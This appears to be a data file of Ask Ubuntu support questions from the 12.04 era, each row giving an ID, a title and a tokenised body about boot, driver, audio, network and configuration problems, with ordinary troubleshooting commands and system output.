163647	black screen on boot after installing via pen-drive	i just intalled ubuntu from a pen-drive . when the instalation finished , it told me to restard . then i restarted and all i got was a black screen with an underline flashing in the left top of the screen . how can i fix this ? i 'm installing it on a notebook , dell inspiron , intel i5 , 4g ram and the video-card is intel hd graphics .
163648	ca n't adjust brightness on samsung rv420 with fn keys	typing ls /sys/class/backlight/*/brightness outputs /sys/class/backlight/intel_backlight/brightness /sys/class/backlight/samsung/brightness the max_brightness for the second is 8 , but changing it with echo 2 | sudo tee /sys/class/backlight/samsung/brightness does n't change brightness . i can do it by using intel_backlight : echo 2000 | sudo tee /sys/class/backlight/intel_backlight/brightness ( max_brightness : cat /sys/class/backlight/intel_backlight/max_brightness outputs 4648 ) . but i want to do this work with the fn brightness keys , as i always did . i do n't know what happened to stop working , maybe the use of +1 monitor and removing it in a wrong time or a system update . i 'm using ubuntu 12.04 64 bits in an samsung rv420 notebook . kernel version is 3.2.0-27-generic . could you help me ? please tell me what more info should i provide . thanks !
163651	why ca n't i get a wired connection to my new router ?	i have only had ubuntu for about a month , when i got it i had no problem connecting to our netgear router using an ethernet cable . we have just replaced our router with an identical one ( due to lightning blowing our last one up ) . i was unable to set up the new router on my computer as the disc wouldnt load , so we set it up on my brother win 7 machine . it seems to work fine and i can connect to it wirelessly on my dads ubuntu 10.04 machine . my computer just doesnt connect , when i go onto network connections in settings it just says cable unplugged , which it isnt . there is no light on for the port my computer is plugged into on the router , although this makes sense as usually the computer has to tell the router it has set up . i have tried manually setting it up through the network manager using the addresses i got from this machine connected wirelessly , i have tried many restarts under different settings . is there anything i can do to make ubuntu see my connection ? thankyou
163656	how can i create private cloud ?	how to create private cloud using ubuntu 12.04 ? how to install cloud and node controller and what basic steps are required ?
163663	disable grub and use apple 's efi-bootloader on macbook pro	how do i remove grub ? i 'm asking because i 'm using a macbook pro and when i boot my computer , it asks me first to choose from os-x or ubuntu ( through apple’s efi-bootloader ) and the second time through ubuntu’s grub bootloader . any tips for how i can fully disable grub ?
163664	virtualbox does n't display menu bar after login	when i boot ubuntu 12.04 in virtualbox , i see virtualbox 's menu bar at the bottom of the screen . after i log in , the menu bar disappears . why ? i really want it back .
163665	ubuntu 12.04 does not detect monitor at boot	i have been using ubuntu 12.04 for a couple of months now with no problems . then one day i restarted my computer , and it would not detect the monitor . if i force it to restart a few times , it finally gets me to a grub screen where i can only boot in recovery mode , and then it only displays in a v. low resolution . i do n't have multiple monitors . i 'm using a viewsonic vp2330wb , and have an intel graphics driver , which i have updated and it still does n't fix the problem . i have been using the same monitor since i got the computer , and this has never been a problem . i would really love to fix this without having to reinstall . thanks .
163666	wubi fails to install kubuntu : `` can not download metalink ... ''	when i try to install it pops up with an error saying `` can not download metalink and therefore the iso '' and i have re-downloaded the installer multiple times and tried reinstalling multiple times . it will not work , and if you could get back to me as soon as possible that would be nice .
163670	how do i set all applications to start unfocused or minimized ?	is n't there a way to force all apps to start up minimized or make them load in the background so they wo n't be opened on top of the window that i 'm working on , besides making the window to be always on top ? i notice lot of similar questions like this one get blindly answered with solution that involves fiddling with window rules setting in compizconfig > general > focus & raise behavior but that actually does nothing to prevent this kind of focus stealing .
163682	how do i install the latest tex live 2012 ?	ubuntu 12.04 still includes the outdated and obsolete 2009 version of tex live . other than installing manually from the tex live website , is there any alternative to install the latest 2012 version on ubuntu precise 12.04 ?
163685	403 forbidden error in apache with document root on an ntfs partition	i 'm a beginner in ubuntu hoping to find a better web development environment than windows . i 'm trying to access http : //localhost but its always giving me a forbidden error . i 've installed php , mysql , and apache separately . files/web_files is also my web directory in windows which when i access on windows is d : /files/web_files and on ubuntu is media/files/web_files . i also restart apache after editing the default file located in etc/apache2/sites-available am i editing the wrong file ? please help . < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /media/files/web_files < directory / > options followsymlinks allowoverride none < /directory > < directory /media/files/web_files/ > options followsymlinks allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > update if i used var/www instead it works like magic . documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options followsymlinks allowoverride all order allow , deny allow from all < /directory > here 's the output from the mount command /dev/loop0 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) /dev/sda2 on /host type fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/wern/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=wern ) /dev/sr0 on /media/2022_21092011 type udf ( ro , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , iocharset=utf8 , umask=0077 ) /dev/sda3 on /media/files type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda1 on /media/system rese and here 's the output from ls - lar/media ls : can not access - : no such file or directory ls : can not access lar : no such file or directory /media : 2022_21092011 files system reserved so i 'm wondering if this is an issue in the filesystem or its permissions . but i do n't think it has something to do with permissions since i can perfectly edit the files in media/files/web_files without having to run it as a superuser . thanks for those who has taken their time to help me so far .
163686	wireless card driver for dell mini 1012 using ubuntu 12.04 not detected ?	i have tried every solution given on the forums and the original `` wireless card driver for dell mini 1012 using ubuntu 12.04 ? '' question here in ask ubuntu and i am still not able to get my wireless card working on my mini 1210 with 12.04 , everything else is working fine but the wireless card . is there another solution other than : sudo apt-get install b43-fwcutter or sudo apt-get install b43-fwcutter firmware-b43-installer
163694	what 's the status of raspberry pi support ?	will 12.10 's arm edition support raspberry pi ? i just bought one and would prefer running ubuntu over fedora .
163695	mediatomb segmentation fault on start watching video	i upgraded to 12.04 ( from 10.04 ) today and it broke my mediatomb . the issue i 'm having is when i try to watch a video then media tomb suddenly crashes . i added the -d flag to the options and ran the command from the command line . no additional pertinent information was added to the log file in /var/log/mediatomb.log , but when i tried to play the video the response was segmentation fault . i do n't think it has to do with this issue mediatomb javascript support becuase i have turned off importing with javascript ( i keep my files in the order that i want them ) . i do n't think it 's an ffmpeg issue becuase i tried : ffmpeg -i `` myfile '' -target dvd -y `` test '' and it started successfully encoding .
163698	why is n't adding a path to `` .profile '' working ?	i am using lubuntu 12.04 . i am having problems setting the path variable for my application . i am trying to set the path variable in the .profile file , however after adding the path when i echo $ path , it does not show my addition . here is the line i am adding at the end of the .profile after the 'fi' export path= $ path : /home/treedev/lib/qt/bin please let me know what i am doing wrong . when i run the above command directly in the bash shell , it works , which leads me to believe i am doing something wrong , but i ca n't seem to figure out where i am wrong . thanks for your time .
163703	ubuntu 12.04 boots into low-graphics mode	to prevent my brother from using my computer , i disabled the guest user account in by following the instructions from this post . during reboot , my brother pressed the down key and ubuntu booted into recovery mode , i then hit the `` continue boot '' option it then 'as the popup warned it would ' booted into low graphics mode with a black screen . i could not see the mouse pointer so i could not continue the boot ( could n't press ok ) and so had to power down the computer externally ( with the button ) . upon reboot , again it runs in low graphics mode but this time i was able to use the mouse . i then intended to boot and then reboot . ( as it said to do after the system recovery mode was run ) ( it warned that it would probably try to boot in low graphics mode because using the system recovery boot option causes it to , but to just boot for one session the reboot and it would be fine ) but when i clicked ok to go into low graphics mode it goes to the boot screen ( the one that says `` ubuntu '' with the dots under it ) and stays there -- it just stays there -- so eventually i had to shut down my computer again . i really want my gui back i 'm only here now because i used ctrl+alt+f1 then logged in then startx ( which brought me to my desktop background with no dock options or anything but the pic ) where i proceeded to use ctrl+alt+t to open terminal and then browser from there . as of now i now have access to a ctrl+alt+f1 terminal as well as a regular terminal achieved through the startx command . everything was working fine before this . i do n't want to lose all my programs and documents . if anyone can help , please do .
163710	how should i change my computer name ?	when i open my terminal it shows gaurav @ lin : ~ $ out of this i want to change `` lin '' which is current name of my computer , how i can do the same ?
163711	deleted windows partitions on drive now what do i do ?	i 'm new to ubuntu and i figured it was time to learn . i am using ubuntu server ( headless ? ) i have a drives as such : *-disk:1 description : ata disk product : toshiba mk1646gs vendor : toshiba physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/sdb version : lb11 serial : 18mit4y8t size : 149gib ( 160gb ) configuration : ansiversion=5 signature=780ee5c1 i have deleted the partitions with help from this thread . do i need to format after deleting the partitions ? also , nice the drive is /dev/sbd i assume i need to mount it ? i 'm a little lost at this point and could use a point in the right direction ! ! thanks all ! ==== edit ==== fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001eb47 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 625141759 312320001 5 extended /dev/sda5 501760 625141759 312320000 8e linux lvm disk /dev/mapper/ubuntu-root : 316.6 gb , 316577677312 bytes 255 heads , 63 sectors/track , 38488 cylinders , total 618315776 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 3217 mb , 3217031168 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6283264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x780ee5c1 device boot start end blocks id system disk /dev/sdc : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x504bbe6a device boot start end blocks id system
163713	what is the best way for using & practicing c language in ubuntu 12.04 ?	i want to learn c language . and i would like to know how i can practice on c language by using ubuntu 12.04 and is there any platform for it and how to get it ? or learn it by terminal and how to use it to ? thanks for reading : )
163720	where do i install the bootloader for a dual-boot system ?	this may be an odd question , but whenever i start up 12.04 installation from my flashdrive , it finishes installation . then , at the end of the installation it says `` failed to install bootloader , would you like to install it elsewhere ? '' and it gives me an option of where to install it . where do i install it to to make sure my windows 7 is n't rendered useless like last time ? included info : i [ will ] have a few partitions . 1 ) the 100gb `` system '' thingie 2 ) windows 7 3 ) ubuntu 12.04 which do i install the bootloader to ? ( in terms of /dev/sda/ , because i dunno how to tell the difference between the names ) xd
163723	why does n't copying the ubuntu iso to a usb or hard drive work ?	sorry if the question sounds stupid in some way , i 'm completly new to ubuntu , never even actually installed it and that 's the problem . i just downloaded the installer , not the wubi , but the one named 'ubuntu-12.04-desktop-i386 ' , i understood that i 'm supposed to save the installer to a cd or flash-pen . since i have no cd 's i copied the file to the pen . i restarted the pc pressed f8 for the booting screen and i select the usb , and i do n't recall what was the error , but it simply said that there was no data to boot from the pen and that i should press any key to reboot . i tried again some more times and still nothing . since i have two hard disks i copied the installer to on that is empty , where i actually want to install ubuntu . so i copied , restarted the pc , boot menu , select the hard drive where the file was on and it says that it 's missing 'bootmgr ' , my question is what i 'm doing wrong ?
163728	why do ntpdate queries take twice as long to execute in 12.04 than 10.04 ?	when i run 'time ntpdate -qd ntp.ubuntu.com ' it takes twice as long to run in ubuntu 12.04 than it does in ubuntu 10.04 . i 've tested this on several physical and virtual machines with similar results . ( do n't fret about the fact that the server is unable to reach the ntp destination ) ubuntu 12.04 : # time ntpdate -qd ntp.ubuntu.com 14 jul 23:33:30 ntpdate [ 12313 ] : ntpdate 4.2.6p3 @ 1.2290-o tue jun 5 20:12:09 ut ) looking for host ntp.ubuntu.com and service ntp host found : europium.canonical.com transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) 91.189.94.4 : server dropped : no data server 91.189.94.4 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 91.189.94.4 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 sun , dec 31 1899 16:00:00.000 originate timestamp : 00000000.00000000 sun , dec 31 1899 16:00:00.000 transmit timestamp : d3ace2c1.9d594e0f sat , jul 14 2012 23:33:37.614 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 14 jul 23:33:39 ntpdate [ 12313 ] : no server suitable for synchronization found real 0m8.665s user 0m0.000s sys 0m0.000s ubuntu 10.04 : # time ntpdate -qd ntp.ubuntu.com 14 jul 23:32:45 ntpdate [ 27970 ] : ntpdate 4.2.4p8 @ 1.1612-o tue apr 19 07:08:19 utc 2011 ( 1 ) looking for host ntp.ubuntu.com and service ntp host found : europium.canonical.com transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) transmit ( 91.189.94.4 ) 91.189.94.4 : server dropped : no data server 91.189.94.4 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 91.189.94.4 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 wed , feb 6 2036 22:28:16.000 originate timestamp : 00000000.00000000 wed , feb 6 2036 22:28:16.000 transmit timestamp : d3ace291.42321a2e sat , jul 14 2012 23:32:49.258 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 14 jul 23:32:50 ntpdate [ 27970 ] : no server suitable for synchronization found real 0m4.755s user 0m0.010s sys 0m0.000s
163729	microphone is not working in skype	i am using ubuntu 12.04 and skype . my mic is not working . i have 1 mic attached to the system and another one in my headphone ( beats by dr. dre ) . i followed these steps : turn pulseaudio autospawn off , normally : $ echo `` autospawn = no '' > ~/.pulse/client.conf killall pulseaudio but this did not help me and it disabled my sound after my system restarted . i then tried echo `` autospawn = yes '' > ~/.pulse/client.conf then pulseaudio -d it fixed my system sound but still no sound on skype microphone . after that , i tried this command echo `` options snd-hda-intel model=acer '' | sudo tee -a /etc/modprobe.d/alsa-base.conf > /dev/null i 've also upgraded alsa sound drivers by running : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa sudo apt-get update sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) however on the last command : sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) [ sudo ] password for gaurav : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-alsa-driver-modules-3.2.0-27-generic-pae e : could n't find any package by regex 'linux-alsa-driver-modules-3.2.0-27-generic-pae' when i type pulseaudio in terminal it shows me e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . after all this , my sound system started behaving abnormally . internal speakers and headphone or 5.1 speakers both works at same time but still the microphone is not working . i even hear a noise when i do n't play anything . it 's freaking me out and my microphone problem is after 12.04 . can i use my headphone microphone ? i am having beats headphones . details of my system alsamixer even now my system sound output connector option is gone here is the screen shot
163735	lost console when ec2 ssh is logged out	i run a java application as a server on a ec2 . but as i loose my ssh connection all console messages are also lost . when i redirect all messages to > my.log and then use tail -f my.log i dont get the e.printstacktrace messages . i wonder what i can do . is there something simple that i can do , to relogin to ssh , find out which console the java application is throwing out all the messages . so instead of doing a java myapp.jar & , i now do a java myapp.jar , so that i dont loose any console messages . the other question is , is there a better command than > my.log that does not miss any message from my application , so that i can log , and do a tail -f my.log ?
163737	how do i create deb package for oracle jdk ?	how do i create a deb package for oracle jdk for personal use ?
163738	about grub rescue command line	please help me.. i have two hard disk in my laptop..window 7 and ubuntu.. i have problem to back in option menu..because i enter one of the list of ubuntu.. in option menu , ,have a list which operatg system i can choose between ubuntu n window7 but the list stil have another menu for ubuntu..i make mistake to choose the another list of ubuntu..and now i have to fix the command line that have grub rescue.. like this : error : no such partition grub rescue > i dont have any idea to fix this problem..i try the another step that i see at the other question but still dont have any answer..this problem is just i enter the another list but do not have any kernel , problem or somethg like that..
163739	how can i upload video on youtube and pause or resume it ?	i need a software , an youtube uploader for ubuntu . i need to pause and resume the uploading when i want . sorry for my english but i 'm italian !
163740	nvidia geforce 610m driver download and installation	i downloaded the driver of nvidia 610m driver on http : //www.geforce.com/drivers but i do n't know how to install it in ubuntu.it is my first time to use ubuntu . i 've already read some answers from the same topic as mine but i do n't understand and do n't know how to use the terminal . please help me.thank you ! : )
163741	how can i install gimp 2.8 's help documentation on ubuntu 12.04 ?	ubuntu 12.04 comes with gimp 2.6 , so i installed gimp 2.8 using the instructions below : sudo apt-get purge gimp* sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp when try to open help , i get the message below . how do i install and configure the help for 2.8 on ubuntu ?
163742	application switcher 's ( compiz ) thumbnails not working in ubuntu 12.04	i have just installed ubuntu 12.04 and i somehow can not get compiz effects to work . especially application switcher 's thumbnails - i only get the icons and i think that changing the options do not change the behavior of the switcher . it did work like a charm in 11.04 can someone help me ?
163746	when install software , how to find out what is in the addon ?	when installing application , there are addon available but are there easy ways to find out what are they like ( libsvg-perl in the application `` inkscape '' ) thanks !
163751	update manager fails , apt-get update stops at 93 %	my updates will not install on ubuntu 12.04 . it gets to 93 % and then gets an error of an ( address not found ) no host name associated with http ( ubuntu.com/etc . etc . i have used the command : sudo apt-get clean and sudo apt-get update ; & & sudo apt-get upgrade . but it stalls on 93 % . i really need to fix this problem as it will not let me take updates . my update manager says no authentic or something like that . please help . thank you .
163753	double mount point created after using mount manager from ubuntu repossitories	after i used mount manager from repo , in nautilus was created two mount points for one disk , one works fine , second is simply an icon , when click is getting error : mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . thats link to image http : //www.freeimagehosting.net/7cw94 help , any idea ? thanks
163755	what are some tablets that can run ubuntu ?	i ca n't believe i 'm actually asking this , but what are some good , cheap tablets that can run ubuntu ? i 'm considering getting a tablet , but i do n't really want an expensive one like an ipad . and i love ubuntu . so what tablets are out there that are cheap , but can also run ubuntu 12.04 without much lag if it 's installed after purchase ? personal anecdotes would be appreciated ! note : i 'm not asking you to help me shop , just to formulate a list of tablets ( +personal preference ) that can use ubuntu .
163762	my computer freezes very often when i watch videos on youtube , or if i browse the web	my computer freezes very often when i watch videos on youtube , or if i browse the web . i think that i have a problem with the driver of my graphic card ... sony vaio svs1311f3e/w intel core i5-3210m ă 2,5 ghz ( 3.1 ghz with intel turbo boost technology ) . memory cache 3 mo . chipset intel hm76 express . ram 4 go ddr3 . hard drive 500 go sata . graphic card intel hd graphics 4000 . ubuntu 12.04 .
163764	possible to suspend via lan ?	i 've already set up wake on lan ( via wifi local network ) and i am able to wake my ubuntu machine via local network ( from windows 7 laptop using wakeonlan from magick packet ) . is there a way to suspend on lan the same machine ? i hate going downstairs each time i finish remote lan work .
163766	installing nvidia 610m 2gb from root	i 've read some answers regarding on how to install the nvidia driver . i followed those steps but got a problem when i ran it in the terminal . this is the error : error : you appear to be running an x server ; please exit x before installing . for further details , please see the section installing the nvidia driver in the readme available on the linux driver download page at www.nvidia.com . you 're help will be very much appreciated ! : ) update : the laptop is optimus enabled .
163767	ubuntu 12.04 not booting to a display manager or login manager	when i boot up my computer with ubuntu install on it , it 's keeps booting and booting forever . it loads the boot screen but it does n't boot up . the only way to log in is to press ctrl+alt+f2 , then enter my user info to login , then i enter sudo lightdm , then login again but only this time i load into the gui . but when the gui freezes , i ca n't do anything so i most hold down my power button on my comter to turn it off . how can i fix this ?
163770	gimp crashes ubuntu 12.04 when using tool	i 'm using gimp 2.6.12 on ubuntu 12.04 . it worked fine until a couple of days ago . this might or might not be relevant , but in the meantime , i tried to plug in my usb photo scanner but since it was not recognized by simplescan i did n't continue to bother ( will do later ) . so now i start gimp and load an image ( image type does n't matter ) . the image is loaded fine but as soon as i attempt to use any tool by clicking onto the image , the entire screen goes black and for a very short time , some error message appears in the upper left corner ( to short to read ) . after that , i 'm presented the logon screen ( all applications are killed ) . i 've tried to uninstall gimp , restart and reinstall , but that did n't help . do you have any advice ? please note that i 'm a newby ( windows deserter ) to ubuntu .
163777	how to get wavy windows effect ( compiz ) in gnome shell ubuntu 11.10	i read lot of links , but did n't found the way to get `` wobbly windows '' effects does anyone know , how to get this effect in gnome shell , i am using ubuntu 11.10 .
163783	tool to easily select a pixel on screen and get color and absolute coordinates	i am looking for a tool that lets me select any pixel on the screen and get its rgb color and absolute ( x , y ) location . i have used tools on windows that show a large magnified square with a crosshair letting me easily select the pixel i want and get its details . is there anything like this for ubuntu ?
163787	video tearing with kde compositing	i have video tearing with compositing enabled in kwin . i have 2 monitors in twinview , vblank is set to sync with one of them . i have some tearing on that monitor anyway , and it 's much worse on the other one . the horizontal tearing occurs everywhere on the desktop , i can see it when dragging windows and such . i 'm on 12.04 with the proprietary 302.17 drivers . vsync is enabled everywhere ( in kwin and nvidia-settings ) . i have nvidia-settings -- load-config-only in startup . the only way i can get rid of the tearing is to disable compositing , and i do n't want to do that . compiz can run with no tearing , so should kwin . i have tried everything , i do n't know what to do anymore . i 've been googling for weeks . i am at my wit 's end .
163790	categorized menus as it was pre-11.04	how can i have menus as it was before unity ? probably not on the desktop as was before but can i have those menus under dash ? a lense maybe ?
163792	where camera are mounted ?	i have a canon powershot a3100 is camera , and , as written in the title , i wanted to know where does the automount mount it when i connect it . does anyone know ? thank you ,
163802	backspace , tab , del and arrow keys not working in terminal ( using ssh )	when i ssh into another ubuntu machine with my account ( with sudo permissions ) , my backspace key generates some awkward symbols on pressing . also tab , del and arrow keys do n't work . on the other hand , i also have another account on the same machine & when i ssh through this account , its terminal works perfectly fine . i could n't figure out why is this happening .
163804	can i automatically change theme according to desktop environment ?	since it is quite a bit of hassle to go into settings , then appearance , then change the theme to ambiance ( for unity ) or adwaita ( for gnome shell ) - is there an automated way of doing this , so if i choose gnome shell at the login screen , the theme will automatically switch to adwaita , and ambiance with unity .
163810	fail2ban is not sending mail when it bans an ip !	i have configured fail2ban to send me a mail when it bans an ip , but it is not working . i get a message when the jails start and stop but nothing else . i am using ssmtp to send mail via google mail . this is my jail.local .
163813	ubuntu 12.04 lts screen refresh problems after returning from suspend	i 'm using the latest proprietary nvidia drivers ( v. 302.17 ) on ubuntu 12.04 lts 64-bit and sometimes after returning from suspend i notice weird screen artifacts or sometimes screen is simply white . however , i 'm able to unlock the screen and the desktop is displayed ( usually ) almost properly - sometimes only the left taskbar seems to be not refreshed fully . i upgraded to 3.3.7 kernel and then to 3.4.0-precise kernel from ppa mainline , but the problem still remains . the problem does n't happen every time , often everything works fine . i also noticed some random graphics hangs ( screen/mouse freezes , but i can log in using ssh ) , but not very often . will the next version of ubuntu address these problems ? if it is an nvidia bug , can you at least provide some workaround for this ? it looks like some timing / race condition issue , because most of the time it works fine . hardware : dell precision m4600 , nvidia quadro 1000m
163815	external display on vortex iii laptop with ivy bridge and nvidia gtx 675m	i am planning to buy a vortex iii laptop : http : //www.pcspecialist.co.uk/notebooks/vortexiii-15/ but i am not sure if i will be able to connect and use it with the external display . does anyone have any experience with this or similar machine ? it is an optimus laptop with intel hd 4000 and geforce gtx 675m . i do not intend to be using gtx 675m with linux . it will be used exclusivelly for gaming ( under the other os ) . i know that in optimus-enabled laptops the hdmi port is normally wired to the nvidia card so that rules hdmi port out . but the machine has dvi and display port as well . can i use one of these to plug a second monitor and still have a laptop display on ? i know there are similar threads on a topic but none of them seems to cover the machine i am looking to buy . thanks !
163816	dash blur effect	i am facing a probem with my dash blur effect . it was working normally before but when i updated software in ubuntu 12.04 , dash does not give any blur effect . if i change the wall paper then the blur effect appears . same problem with panel . i have tried ubuntu tweak , gnome tweak tool , unsetting , myunity , etc . nothing seems to work . can some one help ? ?
163823	how can i mount my dropbox folder as the documents folder on my encrypted home folder after startup ?	what i am trying to do is bind : /home/username/dropbox/documents to /home/username/documents on startup . on another computer running ubuntu 12.04 i did this by placing the following line in /etc/fstab : /home/username/dropbox/documents /home/username/documents auto bind however , on this computer , i have an encrypted home folder , so fstab claims that the location does not exist on boot , asking me to skip mounting it or manually repair . so my question is : how can i mount these folders only after i 've logged into the user with the encrypted home folder ?
163824	ubuntu 12.04 is slow and unresponsive	my laptop works perfectly fast with windows 7 but is very slow in ubuntu 12.04.when i try to open the dash it takes 1-2 sec.even the normal right click on the desktop for the dropdown options is taking time.i installed preload but it made a very slight change . everything is up to date . my laptop is : lenovo ideapad z560 500 gb hard drive ( dual booting win7 and ubuntu 12.04 ) 3 gb ram intel® core™ i3 cpu m 370 @ 2.40ghz × 4 processor nvidia geforce 310m/pcie/sse2 ubuntu 32 bit any help ?
163826	apt error while insalling application	i tried to install phpmyadmin from synaptic . after successfull installation i noticed the config file is empty so i removed it and tried to install it again but i got this error : no type given for question at /usr/share/perl5/debconf/question.pm line 22 , < gen1 > line 2. dpkg : error processing phpmyadmin ( -- configure ) : subprocess installed post-installation script returned error exit status 29 errors were encountered while processing : phpmyadmin now i ca n't install anything ! it continues giving the error to me . what 's the problem ?
163827	how to install network-manager without internet access ?	i have been trying to install some kind of network indicator to show my current bandwidth usage on the panel on top of the screen so i decided to install https : //launchpad.net/ubuntu/+source/indicator-network but just after i have put sudo apt-get install indicator-network i have uninstalled a bunch of vital ubuntu applications e.g . network manager - which was my fault because ubuntu warned me about it but hey ! - why would it mark these applications to remove while installing just an indicator ? now i am unable to connect to the internet with that machine on ubuntu . how can i install network manager back or install it from the usb boot drive with 12.04 that i have ?
163835	ca n't start windows 7 after installing ubuntu 11.04	when i try to start the windows 7 loader in the ubuntu boot menu it says `` no such partition '' . when i installed ubuntu , the setup detected win7 and i chose the option to install ubuntu alongside and choose at each start . please help !
163837	where do i find older ubuntu versions ( specifically 11.10 )	due to compatibility issues i am looking for an older ubuntu version . where can i download onceiric ocelot ? i found this page http : //old-releases.ubuntu.com/releases/ but this only goes up to maverick .
163842	dash does not open files , but the containing folder instead	when clicking on a search result in dash , the containing folder is opened , not the file itself . this happens with all file types .
163843	why can i hear only a few audio channels when playing video files ?	when i play specific mkv files there is not all the sound . there is actually only the background sound , like a song on the background , but i hear no talking . the strangest thing is that it is not for all mkv files but for some . i can however not see a difference between the different files .
163847	ubuntu alternative to thunderbird now that mozilla dropped support	what ubuntu 's plan to mail client now that mozilla dropped support of thunderbird ?
163849	installed ubuntu 12.04 from usb but it 's not working : compiz error	i installed ubuntu 12.04 today . everything went fine . i booted the computer , the password screen appeared . i entered the password and pressed enter . however the desktop never initiates . it freezes in a black screen , and sometimes a error message appear saying that the application compiz has closed unexpectedly . i 'm really eager to start working with ubuntu , so all help would be appreciated . keep in mind that i do n't have much experience with ubuntu . thanks . d .
163855	why does n't windows work on my system ( but ubuntu does ) ?	when i install windows my pc freezes or does n't even start . it accepts only ubuntu ! when i format it and try installing windows again it crashes . sometimes i could n't install ubuntu either but now runs stable 12.04 . is there any huge difference between the way ubuntu works with drives ? i mean , is there any chance my drive is damaged and i 'm just getting a little more time with it by having ubuntu ? thanks edit : i ran a self test with disk utility and says `` disk is healthy '' and bad sectors `` none '' ! i do n't know what else to post . i have the following hardware : processor : 2x amd athlon ( tm ) ii x2 250 processor memory : 8164mb ( 1010mb used ) operating system : ubuntu 12.04 lts opengl renderer : geforce 9600 gt/pcie/sse2 disk : seagate ata st3500413as motherboard : msi 970a-g45 ( ms-7693
163856	how do i get clear wireless to work on ubuntu ? is there a solution ?	i have seen quite a few posts on this issue but no solutions i could find . does anyone know of a way to get a connection using clear . i really do n't want to give up using ubuntu but it seems like i have to . any help is appreciated .
